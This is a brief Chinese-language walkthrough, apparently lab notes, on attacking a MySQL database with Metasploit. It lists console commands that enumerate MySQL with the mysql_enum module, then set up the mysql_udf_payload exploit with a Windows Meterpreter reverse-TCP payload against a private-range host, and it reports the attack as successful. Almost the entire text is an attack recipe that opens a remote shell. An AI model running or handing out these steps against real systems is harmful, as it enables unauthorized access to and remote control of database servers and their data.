攻击MySQL数据库
- 对MySQL进行扫描
搜索:
msf6 > search mysql_enum
msf6 > use auxiliary/admin/mysql/mysql_enum
msf6 auxiliary(admin/mysql/mysql_enum) > run
- 搜索用于攻击的模块
msf6 > search udf
msf6 exploit(multi/mysql/mysql_udf_payload) > set payload payload/windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/mysql/mysql_udf_payload) > set rhosts 192.168.118.4
rhosts => 192.168.118.4
- 使用模块实施攻击
成功。